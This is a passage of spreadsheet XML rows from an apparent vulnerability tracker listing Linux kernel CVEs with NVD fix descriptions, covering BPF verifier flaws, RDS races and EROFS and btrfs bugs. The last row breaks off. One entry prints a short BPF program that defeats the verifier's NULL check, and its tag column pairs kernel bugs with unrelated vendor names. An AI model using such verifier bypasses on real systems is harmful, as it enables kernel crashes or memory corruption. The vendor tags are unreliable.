    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98040</t>
        </is>
      </c>
      <c r="D331" s="5" t="inlineStr"/>
      <c r="E331" s="5" t="inlineStr"/>
      <c r="F331" s="5" t="inlineStr"/>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="inlineStr"/>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr">
        <is>
          <t>checkpoint, go</t>
        </is>
      </c>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr"/>
      <c r="S331" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark the zero register precise for a register-form NULL check
check_cond_jmp_op() accepts "if rA &lt;op&gt; rB" as a NULL check for a
nullable pointer rA when rB is a scalar known to be zero,
lifts PTR_MAYBE_NULL from rA in the corresponding branch and does not
mark rB precise. Consider the following program:
  r0 = bpf_get_prandom_u32();
  r6 = 1;                  /* the r6 == 0 path is explored first */
  if (r0 == 0) goto 1f;
  r6 = 0;
1:
  r0 = bpf_map_lookup_elem(map, &amp;0);  /* absent, NULL at runtime */
  if (r0 == r6) goto 2f;   /* taken as a NULL check for r0       */
  *(u8 *)(r0 + 0);         /* verifier: map value; runtime: zero */
2:
  return 0;
The r6 == 0 path is explored first and the dereference is accepted.
The r6 == 1 path is pruned at the checkpoint recorded for (1),
so the comparison is never verified with a non-zero r6. At runtime a
failed lookup returns NULL, NULL != 1 takes the non-NULL edge and the
program dereferences a pointer that is zero.</t>
        </is>
      </c>
      <c r="T331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98040</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98047</t>
        </is>
      </c>
      <c r="D332" s="5" t="inlineStr"/>
      <c r="E332" s="5" t="inlineStr"/>
      <c r="F332" s="5" t="inlineStr"/>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="inlineStr"/>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr">
        <is>
          <t>sap, gin</t>
        </is>
      </c>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr"/>
      <c r="S332" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check ancestor frames for rbtree callbacks
bpf_rbtree_add() invokes its comparator while the caller holds the root
lock. The native insertion code retains raw parent and link pointers across
the callback, so the verifier prohibits unlocking, consuming tree nodes,
or changing RCU state from that callback.
in_rbtree_lock_required_cb() only checks the innermost verifier frame.
Static subprogram calls are permitted while holding a spin lock, and such a
call pushes a frame without in_callback_fn set. Consequently, all callback
restrictions disappear in the nested frame. The subprogram can unlock the
tree, remove and drop the node being compared, then relock. Native insertion
resumes with the stale parent pointer and links freed memory into the tree.
Walk all active frames for the rbtree callback instead. Benign static
subprograms remain permitted, while callback restrictions follow execution
into nested frames.</t>
        </is>
      </c>
      <c r="T332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98047</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98059</t>
        </is>
      </c>
      <c r="D333" s="5" t="inlineStr"/>
      <c r="E333" s="5" t="inlineStr"/>
      <c r="F333" s="5" t="inlineStr"/>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="inlineStr"/>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr"/>
      <c r="S333" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark sched_process_wait argument as nullable
do_wait() passes wo-&gt;wo_pid to the sched_process_wait tracepoint.
kernel_wait4() leaves wo_pid NULL for wait4(-1), and
kernel_waitid_prepare() does likewise for waitid(P_ALL).
btf_ctx_access() currently types argument 0 as PTR_TO_BTF_ID |
PTR_TRUSTED. Without PTR_MAYBE_NULL, the verifier accepts an unchecked
dereference. Trusted pointer loads have no fault protection, so a wait for
any child can then cause a NULL pointer dereference in JITed BPF code.
Add sched_process_wait to raw_tp_null_args[] with argument 0 marked
nullable. The verifier rejects an unchecked dereference while preserving
access after the program checks the pointer for NULL.</t>
        </is>
      </c>
      <c r="T333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98059</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98062</t>
        </is>
      </c>
      <c r="D334" s="5" t="inlineStr"/>
      <c r="E334" s="5" t="inlineStr"/>
      <c r="F334" s="5" t="inlineStr"/>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="inlineStr"/>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr"/>
      <c r="S334" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark signal tracepoint siginfo arguments as scalar
The signal_generate and signal_deliver tracepoints declare their info
argument as a struct kernel_siginfo pointer. btf_ctx_access() therefore
treats it as a trusted pointer for tp_btf programs.
Signal delivery also uses SEND_SIG_NOINFO and SEND_SIG_PRIV as special
values for this argument. Those values are zero and one respectively,
and are not pointers. A tp_btf program can currently dereference either
value and fault the kernel. In particular, signal_generate can run from
timer interrupt context, turning the fault into a kernel panic.
Record both tracepoints in raw_tp_null_args[] and mark argument one as
a non-pointer. This preserves scalar access to the cookie while rejecting
direct and helper-mediated pointer use. Merely marking it nullable would
not suffice because SEND_SIG_PRIV is nonzero.</t>
        </is>
      </c>
      <c r="T334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98062</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98065</t>
        </is>
      </c>
      <c r="D335" s="5" t="inlineStr"/>
      <c r="E335" s="5" t="inlineStr"/>
      <c r="F335" s="5" t="inlineStr"/>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="inlineStr"/>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr"/>
      <c r="S335" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject key-less BTF for hash maps
map_check_btf() allows a key-less BTF (btf_key_type_id == 0) only for
maps that have a -&gt;map_check_btf callback, and leaves the actual
decision to that callback. Hash maps used to have no -&gt;map_check_btf,
so a key-less BTF was rejected outright.
That changed when htab and rhtab gained a -&gt;map_check_btf to register a
dtor - htab in commit 1df97a7453ee ("bpf: Register dtor for freeing
special fields") and rhtab in commit 6905f8601298 ("bpf: Allow special
fields in resizable hashtab"). Neither looks at the key, so a key-less
hash map now passes map_check_btf() and gets created. Reading it back
through bpffs feeds the key type_id 0 into btf_type_seq_show();
btf_type_by_id() returns the void type, kind_ops[BTF_KIND_UNKN] is NULL,
and btf_type_show() dereferences it:
RIP: 0010:btf_type_show+0x223/0x2e0 kernel/bpf/btf.c:8232
RSP: 0018:ffffc9000399f868 EFLAGS: 00010206
RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000000005 RSI: 0000000000000000 RDI: 0000000000000028
RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000000
R10: ffffc9000399f970 R11: 0000000000000001 R12: ffffffff9b96b140
R13: ffffc9000399f8e0 R14: ffff88803d393c00 R15: 0000000000000003
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000000 CR3: 000000003d213000 CR4: 0000000000352ef0
DR0: 0000000039ae8f55 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Call Trace:
 &lt;TASK&gt;
 btf_type_seq_show_flags+0xca/0x120 kernel/bpf/btf.c:8250
 htab_map_seq_show_elem+0x12e/0x350 kernel/bpf/hashtab.c:1669
 map_seq_show+0x13d/0x1e0 kernel/bpf/inode.c:293
 traverse.part.0.constprop.0+0x107/0x650 fs/seq_file.c:112
 traverse fs/seq_file.c:99 [inline]
 seq_read_iter+0x93f/0x1270 fs/seq_file.c:196
 seq_read+0x344/0x4d0 fs/seq_file.c:163
 vfs_read+0x1e4/0xb40 fs/read_write.c:572
 ksys_pread64 fs/read_write.c:764 [inline]
 __do_sys_pread64 fs/read_write.c:772 [inline]
 __se_sys_pread64 fs/read_write.c:769 [inline]
 __x64_sys_pread64+0x1eb/0x250 fs/read_write.c:769
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x123/0x790 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
Reject a key-less BTF in htab_map_check_btf() and rhtab_map_check_btf(),
restoring the previous behavior.</t>
        </is>
      </c>
      <c r="T335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98065</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98067</t>
        </is>
      </c>
      <c r="D336" s="5" t="inlineStr"/>
      <c r="E336" s="5" t="inlineStr"/>
      <c r="F336" s="5" t="inlineStr"/>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="inlineStr"/>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr">
        <is>
          <t>tempo, go</t>
        </is>
      </c>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr"/>
      <c r="S336" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: disable LZ4 rolling decompression for now
LZ4 rolling decompression [1] was introduced to reduce the memory
footprint of temporary pages:
 For many cases, it is needed for users to read small data within
 a compressed extent (pcluster), either due to random small read, or
 since uptodate folios (typically order-0) cannot be reused for
 decompression again since decompression algorithm refills
 already-uptodate folios.
Rolling decompression works because LZ4 is LZ77-based and only refers
to the most recent 64 KiB of decompressed data, so in theory only a
bounded rolling window of temporary pages is needed when decompressing.
It can save a lot of temporary memory, e.g.
 601,960-byte data can be compressed into a 256k LZ4 compressed extent,
 which means it needs 146 extra pages per request in the worst case if
 rolling decompression is disabled.
However, the upstream LZ4 implementation is not under EROFS' control:
For example, the literal copy memmove() may still **copy long literals
backward** on x86 based on the address comparison even when the source
and destination ranges do not overlap (IOWs, inline decompression
doesn't need to be considered here). That breaks the rolling assumption
and makes the optimization broken.
Disable it for now to make sure the data correctness first since EROFS
is used everywhere now: The rolling window approach can be revived once
we either ensure that the official LZ4 code always copies forward for
non-overlapping ranges or maintain our own LZ4 implementation in EROFS.
The main impact is a higher runtime memory footprint; However, recent
commit 0f6273ab4637 ("erofs: add a reserved buffer pool for lz4
decompression") helps mitigate this when enabled but it's still not
perfect.
[1] https://www.usenix.org/conference/atc19/presentation/gao
    § 3.3 Decompression</t>
        </is>
      </c>
      <c r="T336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98067</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98068</t>
        </is>
      </c>
      <c r="D337" s="5" t="inlineStr"/>
      <c r="E337" s="5" t="inlineStr"/>
      <c r="F337" s="5" t="inlineStr"/>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="inlineStr"/>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr"/>
      <c r="S337" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: don't let rds_conn_shutdown() consume a concurrent drop
rds_conn_shutdown() finishes by moving the path from
RDS_CONN_DISCONNECTING to RDS_CONN_DOWN, and also accepts
RDS_CONN_ERROR as the starting state of that final transition, so that
a FIN processed in softirq context during the teardown does not derail
the shutdown into a noisy error path.
But consuming that RDS_CONN_ERROR also consumes the shutdown pass that
came with it: rds_conn_path_drop() sets RDS_CONN_ERROR and then queues
cp_down_w, and a pass that starts on a path already in RDS_CONN_DOWN
is a no-op.  For the FIN case that is harmless - the socket the FIN
arrived on is the very socket the teardown just released.  It is not
harmless for a dropper that attached something to the path first.
rds_tcp_accept_one() is such a dropper.  Its path claim in
rds_tcp_accept_one_path() transitions RDS_CONN_DOWN -&gt;
RDS_CONN_CONNECTING, and a concurrent drop - a FIN on a previous
socket in softirq context, an administrative reset - can put the path
into RDS_CONN_ERROR between that claim and the state check that
follows, which accepts RDS_CONN_ERROR.  The accept then installs the
freshly accepted socket with rds_tcp_set_callbacks() while the queued
teardown - which sampled tc-&gt;t_sock before this socket existed - is
still running.  rds_connect_path_complete() fails its transition to
RDS_CONN_UP and drops the path again, queueing the pass that should
reap the socket it just installed.  If the in-flight shutdown's final
transition consumes that drop's RDS_CONN_ERROR, the queued pass finds
the path in RDS_CONN_DOWN and does nothing.  The installed socket is
never torn down: it sits established with its callbacks armed and its
rds_tcp_connection on rds_tcp_tc_list, the peer sees a connection that
nothing ever reads, and the path is wedged in RDS_CONN_DOWN until some
later event drops it again.  Reproduced with widened race windows as
an ever-growing receive queue on a socket owned by a path stuck in
RDS_CONN_DOWN, with the peer's send path wedged behind it.
Make the final transition only DISCONNECTING -&gt; DOWN.  If it fails
because the path is in RDS_CONN_ERROR, a drop raced the teardown:
cancel the reconnect timer and clear RDS_RECONNECT_PENDING - the one
piece of the skipped tail that must not be left behind - and return,
letting the pass the drop queued finish the job: it tears down
whatever attached to the path in the meantime, completes the
transition to RDS_CONN_DOWN, and re-arms the reconnect from its own
tail.
The timer quiesce in that branch matters because the racing drop does
not always queue that pass: rds_conn_path_drop() returns without
queueing when a destroy is pending - exactly the situation during a
netns teardown or module unload, when a FIN on the dying socket is
processed while rds_conn_path_destroy() flushes cp_down_w.  If the
flushed pass is the one that takes this return, no later pass exists,
and rds_conn_path_destroy() would find cp_conn_w still armed
(WARN_ON) and then free a path whose reconnect timer can still fire.
With the cancel in the branch, every exit of a shutdown pass leaves
the timer quiesced no matter which pass completes the transition.
The FIN case keeps making progress, one pass later and still without
noisy logging.  Any other state keeps today's rds_conn_path_error()
handling; no current cp_state writer can leave a DISCONNECTING path
in anything but RDS_CONN_ERROR (every other writer is a cmpxchg from
a non-DISCONNECTING state), so that branch is defensive.
On kernels without the preceding patches the same hazard exists with
the sample-based quiesce; the fix applies there equally.</t>
        </is>
      </c>
      <c r="T337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98068</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98071</t>
        </is>
      </c>
      <c r="D338" s="5" t="inlineStr"/>
      <c r="E338" s="5" t="inlineStr"/>
      <c r="F338" s="5" t="inlineStr"/>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="inlineStr"/>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr"/>
      <c r="S338" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: clear cp_flags bits individually in rds_conn_path_reset()
rds_conn_path_reset() wipes the whole flag word with a plain
cp-&gt;cp_flags = 0 store.  Every other accessor of that word uses
atomic bitops, and some of them can run concurrently with the reset:
RDS_LL_SEND_FULL is set from rds_send_xmit() and cleared from the
transport completion paths, neither of which holds anything that
excludes the shutdown worker.  A plain store racing an atomic
read-modify-write on the same word is a data race, and whichever
side loses has its update silently discarded.
Clear the two bits the reset is actually responsible for instead.
RDS_IN_XMIT and RDS_RECV_REFILL need no store at all here: they
belong to the caller, rds_conn_shutdown(), which waits for both to be
clear before calling the transport shutdown and this reset.
This also gives every bit in cp_flags a single well-defined writer
discipline, which the following patches rely on when they turn
RDS_IN_XMIT and RDS_RECV_REFILL into bit locks held across the
teardown: a blanket store mid-teardown would destroy lock ownership
that an atomic clear preserves.
Oracle UEK carries the same conversion ("net/rds: Preserve essential
connection state flags"), motivated by its asynchronous shutdown
state machine, whose progress and destroy flags must survive the
reset.  UEK's variant also clears RDS_IN_XMIT and RDS_RECV_REFILL
because there the reset runs as the final step of a teardown that
owns both bits, making those clears its unlock.  Upstream that
release belongs in rds_conn_shutdown(): once a later patch in this
series turns the two bits into locks held across the teardown, ending
ownership needs release semantics and a wake-up that a plain clear
inside the reset would not provide.
Based on Oracle UEK commit "net/rds: Preserve essential connection
state flags" by Gerd Rausch.</t>
        </is>
      </c>
      <c r="T338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98071</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98079</t>
        </is>
      </c>
      <c r="D339" s="5" t="inlineStr"/>
      <c r="E339" s="5" t="inlineStr"/>
      <c r="F339" s="5" t="inlineStr"/>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="inlineStr"/>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr"/>
      <c r="S339" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zstd: fix lost wakeup when waiting for a workspace
A writer can sleep forever in zstd_get_workspace() even though a workspace
is free.  When zstd_alloc_workspace() fails, the task is queued on
zwsm-&gt;wait and schedules unconditionally, never re-testing the pool.
zstd_put_workspace() publishes the workspace and then calls cond_wake_up(),
which only wakes when a sleeper is already visible, so a workspace returned
between the failed allocation and prepare_to_wait() wakes nobody.  The
window is wide: zstd_alloc_workspace() goes through kvmalloc() and may
enter reclaim.
Only a max level workspace triggers the wakeup and one is deliberately kept
allocated as the fallback every waiter waits for, so once its wakeup is
lost the writer stays in TASK_UNINTERRUPTIBLE until some other task happens
to return one.  Re-check the pool after prepare_to_wait() has published the
waiter, and use the workspace if one turned up.</t>
        </is>
      </c>
      <c r="T339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98079</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98084</t>
        </is>
      </c>
      <c r="D340" s="5" t="inlineStr"/>
      <c r="E340" s="5" t="inlineStr"/>
      <c r="F340" s="5" t="inlineStr"/>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="inlineStr"/>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr">
        <is>
          <t>checkpoint</t>
        </is>
      </c>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q340" s="5" t="inlineStr"/>
      <c r="R340" s="5" t="inlineStr"/>
      <c r="S340" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: backtracking shouldn't clear outer frame R1-R5 for callbacks
When processing calls to bpf_loop() verifier marks R1 (and R4) as
precise. R1 tracks loop iterations number and because of the
'callback_depth &lt; R1' mechanics in check_helper_call() must be marked
precise. However, precision propagation for R1 was broken,
when bpf_loop() call was verified on a second iteration.
Consider the following verification trace:
- main: bpf_loop(nr_loops, callback ...)
- callback: BPF_EXIT
- main: bpf_loop(nr_loops, callback ...)
- ...
While the first visit of the call to bpf_loop() propagated R1
precision as expected, the second call to mark_chain_precision() in
the check_helper_call() set R1, but it was immediately reset when
backtrack_insn() processed preceding BPF_EXIT in the loop deleted in
this patch.
Because of that, the second visit of the call to bpf_loop() injected
checkpoint with R1 not marked as precise. Which could trick the
verifier into accepting unsafe programs. See the next patch for an
example of such program.
Commit is structured in a way to minimize conflicts when
'bpf' would be eventually merged with 'bpf-next'.</t>
        </is>
      </c>
      <c r="T340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98084</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98085</t>
        </is>
      </c>
      <c r="D341" s="5" t="inlineStr"/>
      <c r="E341" s="5" t="inlineStr"/>
      <c r="F341" s="5" t="inlineStr"/>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="inlineStr"/>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q341" s="5" t="inlineStr"/>
      <c r="R341" s="5" t="inlineStr"/>
      <c r="S341" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: backtrack_insn(): Handle ld_{abs,ind} subprog exit edge
Nicholas Carlini reported a bug in precision backtracking mechanism
for BPF_LD | BPF_{IND,ABS} instructions. These instructions are
modelled as two branches:
- fallthrough;
- implicit exit from current subprogram.
The implicit exit case was not handled by the backtrack_insn()
function. When backtracking such a path backtrack_insn() did not
call bt_subprog_enter(), which meant that backtracking continued
manipulating precision marks in a caller frame, while looking at
instructions in a callee frame.
This lead to segmentation faults during verification (see the
selftest), or unsound state pruning.</t>
        </is>
      </c>
      <c r="T341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98085</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98087</t>
        </is>
      </c>
      <c r="D342" s="5" t="inlineStr"/>
      <c r="E342" s="5" t="inlineStr"/>
      <c r="F342" s="5" t="inlineStr"/>
